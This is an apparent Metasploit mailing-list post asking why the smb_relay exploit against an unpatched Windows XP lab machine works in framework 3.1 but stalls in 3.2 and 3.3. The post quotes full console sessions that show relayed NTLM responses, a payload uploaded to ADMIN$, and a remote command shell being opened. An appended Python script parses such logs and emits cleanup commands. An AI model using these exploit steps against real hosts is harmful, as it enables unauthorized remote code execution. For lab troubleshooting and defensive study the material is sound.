Metasploit mailing list archives

smbrelay: framework 3.1 more reliable than 3.2 and 3.3?


From: m.iodice at gmail.com (Mirko Iodice)
Date: Tue, 2 Dec 2008 10:26:46 +0100

Recently I tested the smbrelay attack from 3 different versions of
Metasploit against an unpatched (MS08-068) Windows XP Pro SP2 (VMware
test machine).
I got the same strange results running the attack from two
different Linux boxes: one is my Ubuntu Intrepid Ibex and the other is
a BackTrack 3 virtual machine.

Below you can find the results; only Metasploit Framework 3.1 always
works... can someone explain what's happening?

Thank you.

---
msf v3.3-dev rev. 5990 vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1129 TESTDOMAIN\Administrator
LMHASH:7a82adf17f0d0d797eea14a99f17a00883c8db54aebfece8
NTHASH:8a2ffa5bd93d8a445f7b403d905c78b36909948a81e4b2ba OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \QUmlMAKy.exe...
[*] Connecting to the Service Control Manager...

get stuck here and nothing happens...

---
msf v3.2-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1145 TESTDOMAIN\Administrator
LMHASH:b1af5fb25aedf0a866e0c894fc7245c120a901b7811ecdc9
NTHASH:c72f5d912ab3429c187391217d7c17888fe0dbd2dc84a228 OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \fcRkDlSK.exe...
[*] Connecting to the Service Control Manager...

get stuck here and nothing happens...

---
msf v3.1-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Server started.
msf exploit(smb_relay) >
[*] Received 192.168.109.128:1181 TESTDOMAIN\Administrator
LMHASH:b28812aaf57e770414a8f6d52eae10f907b2c4479b63f0b5
NTHASH:20b10932651da64ea42a2f0a6aaea0e59f7aba4d9bda6fa3 OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \DIfcbGwH.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: 192.168.109.128 (DyHcMKdL
- "MrXgHSxGCUuHbsLgpIFNQmAd")
[*] You *MUST* manually delete the service file: 192.168.109.128
%SYSTEMROOT%\DIfcbGwH.exe

[*] Starting the service...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.109.1:44105 -> 192.168.109.128:4444)

it works!

---
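A small triage helper, added here as an example and not part of the post or of Metasploit: it takes msfconsole output like the three runs above (the constructed SAMPLE below copies the stalled 3.3-dev run and the successful 3.1 run, with the line wrapping the mailing-list archive introduced left in), re-joins the wrapped lines, and reports per run which account was relayed, the last step reached, whether a session opened, and the service/file artifacts the 3.1 run says must be removed by hand. The `sc \\host delete` and `del \\host\ADMIN$\...` cleanup commands it emits are an assumption about how an operator would undo those artifacts (ADMIN$ maps to %SYSTEMROOT%), not something the post states.

```python
import re

# Constructed sample: two of the runs quoted in the post, values copied from
# it, including the mail-archive line wrapping of the long console messages.
SAMPLE = r"""msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1129 TESTDOMAIN\Administrator
LMHASH:7a82adf17f0d0d797eea14a99f17a00883c8db54aebfece8
NTHASH:8a2ffa5bd93d8a445f7b403d905c78b36909948a81e4b2ba OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \QUmlMAKy.exe...
[*] Connecting to the Service Control Manager...
---
msf > use windows/smb/smb_relay
msf exploit(smb_relay) > exploit
[*] Server started.
msf exploit(smb_relay) >
[*] Received 192.168.109.128:1181 TESTDOMAIN\Administrator
LMHASH:b28812aaf57e770414a8f6d52eae10f907b2c4479b63f0b5
NTHASH:20b10932651da64ea42a2f0a6aaea0e59f7aba4d9bda6fa3 OS:Windows
2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \DIfcbGwH.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: 192.168.109.128 (DyHcMKdL
- "MrXgHSxGCUuHbsLgpIFNQmAd")
[*] You *MUST* manually delete the service file: 192.168.109.128
%SYSTEMROOT%\DIfcbGwH.exe

[*] Starting the service...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.109.1:44105 -> 192.168.109.128:4444)
"""

# Lines that begin a new console record; anything else following a "[..]"
# message is treated as a wrapped continuation of that message.
RECORD_START = ('[*] ', '[-] ', '[+] ', '[!] ', 'msf', '---')

RE_RECV = re.compile(
    r'^\[\*\] Received (?P<ip>[\d.]+):(?P<port>\d+) (?P<user>\S+) '
    r'LMHASH:(?P<lm>[0-9a-fA-F]+) NTHASH:(?P<nt>[0-9a-fA-F]+) '
    r'OS:(?P<os>.+?) LM:(?P<lm_os>.+)$')
RE_SERVICE = re.compile(
    r'remove the service: (?P<host>\S+) \((?P<name>\S+) - "(?P<display>[^"]*)"\)')
RE_FILE = re.compile(r'delete the service file: (?P<host>\S+) (?P<path>\S+)')
RE_SESSION = re.compile(
    r'session (?P<id>\d+) opened \((?P<local>\S+) -> (?P<remote>\S+)\)')


def unwrap(text):
    """Re-join console messages that a mail client split across lines."""
    lines = []
    for raw in text.splitlines():
        line = raw.rstrip()
        continuation = (lines and lines[-1].startswith('[') and line
                        and not line.startswith(RECORD_START))
        if continuation:
            lines[-1] += ' ' + line.strip()
        else:
            lines.append(line)
    return lines


def split_runs(lines):
    """Split on the '---' separators the poster used between runs."""
    runs, cur = [], []
    for line in lines:
        if line.startswith('---'):
            if cur:
                runs.append(cur)
            cur = []
        else:
            cur.append(line)
    if cur:
        runs.append(cur)
    return runs


def analyze_run(lines):
    result = {'captures': [], 'cleanup': [], 'session': None, 'last_step': None}
    for line in lines:
        if line.startswith('[*] '):
            result['last_step'] = line[4:]
        m = RE_RECV.match(line)
        if m:
            cap = m.groupdict()
            # 48 hex chars = 24 bytes: what msf labels LMHASH/NTHASH here are
            # the client's NTLM challenge-responses, not password hashes.
            cap['response_bytes'] = len(cap['lm']) // 2
            result['captures'].append(cap)
            continue
        m = RE_SERVICE.search(line)
        if m:
            result['cleanup'].append(('service', m['host'], m['name']))
            continue
        m = RE_FILE.search(line)
        if m:
            result['cleanup'].append(('file', m['host'], m['path']))
            continue
        m = RE_SESSION.search(line)
        if m:
            result['session'] = (int(m['id']), m['local'], m['remote'])
    return result


def analyze(text):
    return [analyze_run(run) for run in split_runs(unwrap(text))]


def outcome(result):
    if result['session']:
        return 'session opened'
    return 'stalled at: ' + (result['last_step'] or 'no output')


def cleanup_commands(result):
    """Assumed sc.exe / ADMIN$ commands to undo the leftovers msf warns about."""
    cmds = []
    for kind, host, what in result['cleanup']:
        if kind == 'service':
            cmds.append('sc \\\\' + host + ' delete ' + what)
        else:
            rel = what.replace('%SYSTEMROOT%\\', '')  # ADMIN$ is %SYSTEMROOT%
            cmds.append('del \\\\' + host + '\\ADMIN$\\' + rel)
    return cmds


if __name__ == '__main__':
    for i, r in enumerate(analyze(SAMPLE), 1):
        users = [c['user'] for c in r['captures']]
        print('run %d: relayed %s; %s' % (i, users, outcome(r)))
        for cmd in cleanup_commands(r):
            print('  cleanup: ' + cmd)
```

Run it against a saved console log to see at a glance which runs reached "Starting the service" and which stopped at the Service Control Manager step, and to get the cleanup list for the ones that succeeded.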